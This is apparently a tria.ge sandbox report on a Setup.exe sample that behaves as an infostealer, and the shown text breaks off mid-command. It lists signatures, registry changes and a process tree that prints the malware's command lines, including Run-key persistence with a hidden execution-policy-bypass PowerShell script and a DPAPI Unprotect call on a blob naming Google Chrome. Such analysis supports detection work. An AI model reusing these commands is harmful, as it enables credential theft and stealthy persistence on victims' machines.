Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21/07/2024, 11:30
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v2004-20240709-en
General
-
Target
Setup.exe
-
Size
37.6MB
-
MD5
578301380ec4b2da9433e8e9a13e725f
-
SHA1
abc3b5d3668f7436c60e15abdb10566b25ed2d2b
-
SHA256
f03ff5ad41acc12ee8b940934a1341f7bdd98e09eb9a6c92704e2067020f8b41
-
SHA512
b6f893c1fdb1d11bb40429fa554cc8a7f4bd49e5766c3a47a2dcb90e5eec6ba5c71c8cc02466c51f9c6775ce0100788087693649656f6aeaca7a62c5c0e01125
-
SSDEEP
393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg896l+ZArYsFRl0PX:R3on1HvSzxAMN8FZArYssPv0q7OZaFN1
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5028 powershell.exe 2328 powershell.exe 1620 powershell.exe 2520 powershell.exe 4796 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation cscript.exe -
Loads dropped DLL 1 IoCs
pid Process 3164 Setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\QVMpJuFULqHDdog.ps1\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Setup.exe" reg.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 1412 cmd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 2212 cmd.exe 4296 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 13 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3568 WMIC.exe 1624 WMIC.exe 3608 WMIC.exe 2028 WMIC.exe 1512 WMIC.exe 2564 WMIC.exe 624 WMIC.exe 2708 WMIC.exe 3548 WMIC.exe 4736 WMIC.exe 624 WMIC.exe 1068 WMIC.exe 1268 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1572 tasklist.exe 4272 tasklist.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9938 = "3GPP2 Audio/Video" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithList SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21825 = "3D Objects" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000007b62a5d161dbda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE SearchFilterHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000206467d161dbda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000004bce74d261dbda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS\OpenWithList SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{80009818-F38F-4AF1-87B5-EADAB9433E58} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000005ff57bd261dbda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4804 = "JavaScript File" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000001cfee0d161dbda01 SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c89f62d161dbda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9933 = "MPEG-4 Audio" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c4c2c6d161dbda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\acppage.dll,-6002 = "Windows Batch File" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d3b194d161dbda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4803 = "VBScript Encoded Script File" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000001f0184d161dbda01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-105 = "Windows PowerShell XML Document" SearchProtocolHost.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 8 reg.exe 3096 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3824 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 59 IoCs
pid Process 2520 powershell.exe 2520 powershell.exe 4312 powershell.exe 4312 powershell.exe 4112 powershell.exe 4112 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 5028 powershell.exe 5028 powershell.exe 5028 powershell.exe 4312 powershell.exe 4312 powershell.exe 4312 powershell.exe 2328 powershell.exe 2328 powershell.exe 2328 powershell.exe 1520 powershell.exe 1520 powershell.exe 1520 powershell.exe 2716 powershell.exe 2716 powershell.exe 2716 powershell.exe 4900 powershell.exe 4900 powershell.exe 4900 powershell.exe 4848 powershell.exe 4848 powershell.exe 4796 powershell.exe 4796 powershell.exe 4848 powershell.exe 4796 powershell.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 4312 powershell.exe 4312 powershell.exe 4312 powershell.exe 3164 Setup.exe 3164 Setup.exe 3164 Setup.exe 1844 powershell.exe 1844 powershell.exe 1844 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 5080 powershell.exe 5080 powershell.exe 5080 powershell.exe 3520 powershell.exe 3520 powershell.exe 3520 powershell.exe 2772 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2520 powershell.exe Token: SeDebugPrivilege 1572 tasklist.exe Token: SeDebugPrivilege 4272 tasklist.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeDebugPrivilege 4112 powershell.exe Token: SeIncreaseQuotaPrivilege 68 WMIC.exe Token: SeSecurityPrivilege 68 WMIC.exe Token: SeTakeOwnershipPrivilege 68 WMIC.exe Token: SeLoadDriverPrivilege 68 WMIC.exe Token: SeSystemProfilePrivilege 68 WMIC.exe Token: SeSystemtimePrivilege 68 WMIC.exe Token: SeProfSingleProcessPrivilege 68 WMIC.exe Token: SeIncBasePriorityPrivilege 68 WMIC.exe Token: SeCreatePagefilePrivilege 68 WMIC.exe Token: SeBackupPrivilege 68 WMIC.exe Token: SeRestorePrivilege 68 WMIC.exe Token: SeShutdownPrivilege 68 WMIC.exe Token: SeDebugPrivilege 68 WMIC.exe Token: SeSystemEnvironmentPrivilege 68 WMIC.exe Token: SeRemoteShutdownPrivilege 68 WMIC.exe Token: SeUndockPrivilege 68 WMIC.exe Token: SeManageVolumePrivilege 68 WMIC.exe Token: 33 68 WMIC.exe Token: 34 68 WMIC.exe Token: 35 68 WMIC.exe Token: 36 68 WMIC.exe Token: SeIncreaseQuotaPrivilege 2816 WMIC.exe Token: SeSecurityPrivilege 2816 WMIC.exe Token: SeTakeOwnershipPrivilege 2816 WMIC.exe Token: SeLoadDriverPrivilege 2816 WMIC.exe Token: SeSystemProfilePrivilege 2816 WMIC.exe Token: SeSystemtimePrivilege 2816 WMIC.exe Token: SeProfSingleProcessPrivilege 2816 WMIC.exe Token: SeIncBasePriorityPrivilege 2816 WMIC.exe Token: SeCreatePagefilePrivilege 2816 WMIC.exe Token: SeBackupPrivilege 2816 WMIC.exe Token: SeRestorePrivilege 2816 WMIC.exe Token: SeShutdownPrivilege 2816 WMIC.exe Token: SeDebugPrivilege 2816 WMIC.exe Token: SeSystemEnvironmentPrivilege 2816 WMIC.exe Token: SeRemoteShutdownPrivilege 2816 WMIC.exe Token: SeUndockPrivilege 2816 WMIC.exe Token: SeManageVolumePrivilege 2816 WMIC.exe Token: 33 2816 WMIC.exe Token: 34 2816 WMIC.exe Token: 35 2816 WMIC.exe Token: 36 2816 WMIC.exe Token: SeIncreaseQuotaPrivilege 68 WMIC.exe Token: SeSecurityPrivilege 68 WMIC.exe Token: SeTakeOwnershipPrivilege 68 WMIC.exe Token: SeLoadDriverPrivilege 68 WMIC.exe Token: SeSystemProfilePrivilege 68 WMIC.exe Token: SeSystemtimePrivilege 68 WMIC.exe Token: SeProfSingleProcessPrivilege 68 WMIC.exe Token: SeIncBasePriorityPrivilege 68 WMIC.exe Token: SeCreatePagefilePrivilege 68 WMIC.exe Token: SeBackupPrivilege 68 WMIC.exe Token: SeRestorePrivilege 68 WMIC.exe Token: SeShutdownPrivilege 68 WMIC.exe Token: SeDebugPrivilege 68 WMIC.exe Token: SeSystemEnvironmentPrivilege 68 WMIC.exe Token: SeRemoteShutdownPrivilege 68 WMIC.exe Token: SeUndockPrivilege 68 WMIC.exe Token: SeManageVolumePrivilege 68 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3164 wrote to memory of 5092 3164 Setup.exe 88 PID 3164 wrote to memory of 5092 3164 Setup.exe 88 PID 5092 wrote to memory of 1900 5092 cmd.exe 89 PID 5092 wrote to memory of 1900 5092 cmd.exe 89 PID 5092 wrote to memory of 2520 5092 cmd.exe 90 PID 5092 wrote to memory of 2520 5092 cmd.exe 90 PID 2520 wrote to memory of 1436 2520 powershell.exe 93 PID 2520 wrote to memory of 1436 2520 powershell.exe 93 PID 1436 wrote to memory of 3608 1436 csc.exe 94 PID 1436 wrote to memory of 3608 1436 csc.exe 94 PID 3164 wrote to memory of 668 3164 Setup.exe 95 PID 3164 wrote to memory of 668 3164 Setup.exe 95 PID 668 wrote to memory of 4076 668 cmd.exe 96 PID 668 wrote to memory of 4076 668 cmd.exe 96 PID 3164 wrote to memory of 4940 3164 Setup.exe 97 PID 3164 wrote to memory of 4940 3164 Setup.exe 97 PID 4940 wrote to memory of 1572 4940 cmd.exe 98 PID 4940 wrote to memory of 1572 4940 cmd.exe 98 PID 3164 wrote to memory of 1608 3164 Setup.exe 101 PID 3164 wrote to memory of 1608 3164 Setup.exe 101 PID 3164 wrote to memory of 2212 3164 Setup.exe 102 PID 3164 wrote to memory of 2212 3164 Setup.exe 102 PID 1608 wrote to memory of 4272 1608 cmd.exe 103 PID 1608 wrote to memory of 4272 1608 cmd.exe 103 PID 2212 wrote to memory of 4312 2212 cmd.exe 104 PID 2212 wrote to memory of 4312 2212 cmd.exe 104 PID 3164 wrote to memory of 4296 3164 Setup.exe 105 PID 3164 wrote to memory of 4296 3164 Setup.exe 105 PID 4296 wrote to memory of 4112 4296 cmd.exe 106 PID 4296 wrote to memory of 4112 4296 cmd.exe 106 PID 3164 wrote to memory of 4812 3164 Setup.exe 107 PID 3164 wrote to memory of 4812 3164 Setup.exe 107 PID 3164 wrote to memory of 4868 3164 Setup.exe 108 PID 3164 wrote to memory of 4868 3164 Setup.exe 108 PID 3164 wrote to memory of 4908 3164 Setup.exe 109 PID 3164 wrote to memory of 4908 3164 Setup.exe 109 PID 3164 wrote to memory of 1412 3164 Setup.exe 110 PID 3164 wrote to memory of 1412 3164 Setup.exe 110 PID 4812 wrote to memory of 68 4812 cmd.exe 145 PID 4812 wrote to memory of 68 4812 cmd.exe 145 PID 4868 wrote to memory of 1976 4868 cmd.exe 113 PID 4868 wrote to memory of 1976 4868 cmd.exe 113 PID 4908 wrote to memory of 3824 4908 cmd.exe 112 PID 4908 wrote to memory of 3824 4908 cmd.exe 112 PID 3164 wrote to memory of 4100 3164 Setup.exe 146 PID 3164 wrote to memory of 4100 3164 Setup.exe 146 PID 1412 wrote to memory of 1620 1412 cmd.exe 115 PID 1412 wrote to memory of 1620 1412 cmd.exe 115 PID 4100 wrote to memory of 2816 4100 cmd.exe 116 PID 4100 wrote to memory of 2816 4100 cmd.exe 116 PID 3164 wrote to memory of 516 3164 Setup.exe 117 PID 3164 wrote to memory of 516 3164 Setup.exe 117 PID 516 wrote to memory of 4180 516 cmd.exe 118 PID 516 wrote to memory of 4180 516 cmd.exe 118 PID 3164 wrote to memory of 4504 3164 Setup.exe 119 PID 3164 wrote to memory of 4504 3164 Setup.exe 119 PID 4504 wrote to memory of 2348 4504 cmd.exe 120 PID 4504 wrote to memory of 2348 4504 cmd.exe 120 PID 3164 wrote to memory of 4900 3164 Setup.exe 121 PID 3164 wrote to memory of 4900 3164 Setup.exe 121 PID 4900 wrote to memory of 3808 4900 cmd.exe 122 PID 4900 wrote to memory of 3808 4900 cmd.exe 122 PID 4900 wrote to memory of 4148 4900 cmd.exe 123 PID 4900 wrote to memory of 4148 4900 cmd.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:1900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pft4ryoz\pft4ryoz.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9347.tmp" "c:\Users\Admin\AppData\Local\Temp\pft4ryoz\CSC99EC05581CD945618B9E5F1369787A6B.TMP"5⤵PID:3608
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,78,225,238,81,242,54,93,114,41,201,135,233,255,51,75,238,124,114,206,112,243,167,94,224,197,29,56,62,200,31,128,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,40,81,43,68,9,153,70,109,187,36,190,193,130,199,26,127,136,124,228,38,75,140,243,89,30,61,103,46,86,143,248,114,48,0,0,0,74,114,75,149,196,38,186,148,133,105,94,129,195,110,235,68,200,129,136,10,22,240,206,253,218,83,18,90,16,39,9,59,49,59,29,171,216,54,192,146,21,178,227,71,99,75,94,246,64,0,0,0,180,88,177,47,121,123,242,119,228,145,146,122,99,155,71,54,241,51,242,143,81,213,228,170,129,248,243,66,58,36,75,175,250,106,42,226,225,210,105,192,4,197,208,8,192,1,143,181,94,58,123,195,86,100,93,247,64,252,117,239,146,183,104,157), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,78,225,238,81,242,54,93,114,41,201,135,233,255,51,75,238,124,114,206,112,243,167,94,224,197,29,56,62,200,31,128,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,40,81,43,68,9,153,70,109,187,36,190,193,130,199,26,127,136,124,228,38,75,140,243,89,30,61,103,46,86,143,248,114,48,0,0,0,74,114,75,149,196,38,186,148,133,105,94,129,195,110,235,68,200,129,136,10,22,240,206,253,218,83,18,90,16,39,9,59,49,59,29,171,216,54,192,146,21,178,227,71,99,75,94,246,64,0,0,0,180,88,177,47,121,123,242,119,228,145,146,122,99,155,71,54,241,51,242,143,81,213,228,170,129,248,243,66,58,36,75,175,250,106,42,226,225,210,105,192,4,197,208,8,192,1,143,181,94,58,